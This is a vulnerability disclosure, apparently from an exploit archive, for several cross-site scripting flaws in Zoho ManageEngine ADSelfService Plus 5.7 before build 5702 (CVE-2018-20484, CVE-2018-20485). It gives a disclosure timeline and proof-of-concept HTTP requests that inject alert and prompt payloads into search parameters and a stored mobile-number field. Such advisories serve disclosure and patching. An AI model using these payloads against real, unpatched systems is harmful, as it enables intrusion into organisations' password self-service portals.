ExploitFixes
Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting 2019-05-09 21:05:18

[+] Zoho ManageEngine ADSelfService Plus 5.7 &lt; 5702 build - Multiple Cross-Site Scripting
[+] Author: Ibrahim Raafat
[+] Twitter: https://twitter.com/RaafatSEC
[+] Download: https://www.manageengine.com/products/self-service-password/download-free.html?


[+] TimeLine
[-] Nov 23, 2018 Reported
[-] Nov 26, 2018 Triaged
[-] Dec 27, 2018 Fixed
[-] May 08, 2019 Public Disclosure

[+] Description:
Zoho ManageEngine ADSelfService Plus 5.7 before build 5702 has Multiple XSS vulnerabilites

[+] POC

[-] Employee search form

POST /EmployeeSearch.cc?actionId=Search HTTP/1.1

searchString=dddddffff&quot;);a=alert,a(31337)//&amp;&amp;searchType=contains&amp;searchBy=ALL_FIELDS333');a=alert,a(31337)//&amp;adscsrf=
searchType parameter:
searchString=a&amp;searchType=containss9ek&quot;;a=alert,a(31337)//&amp;searchBy=ALL_FIELDS&amp;adscsrf=


2- Employee Search &ndash; ascending parameter

/EmployeeSearch.cc?actionId=showList&amp;searchBy=ALL_FIELDS&amp;searchType=contains&amp;PAGE_NUMBER=37&amp;FROM_INDEX=22&amp;TO_INDEX=22&amp;RANGE=100&amp;navigate=true&amp;navigationType=&amp;START_INDEX=22 HTTP/1.1

selOUs=&amp;genID=12191&amp;ACTIVE_TAB=user&amp;sortIndex=0&amp;ascending=true&rsquo;;a=alert,a(31337)//&amp;&amp;searchString=a&amp;TOTAL_RECORDS=22&amp;adscsrf=


3- EmpSearch.cc - searchString parameter

POST /EmpSearch.cc?operation=getSearchResult&amp;REQUEST_TYPE=JSON&amp;searchString=RR&lt;svg/onload=prompt(8)&gt;&amp;searchType=contains&amp;searchBy=ALL_FIELDS&amp;actionId=Search HTTP/1.1

&amp;adscsrf=

4- Stored XSS in self-update layout implementation.

/SelfService.do?methodToCall=selfService&amp;selectedTab=UpdateFields
Insert the following payload into Mobile Number field, and save
Payload: 11111111]&quot;;a=alert,a(31337)//
Code execute here:
/Enrollment.do?selectedTab=Enrollment


[+] Assigned CVE: CVE-2018-20484,CVE-2018-20485
[+] Release Notes: https://www.manageengine.com/products/self-service-password/release-notes.html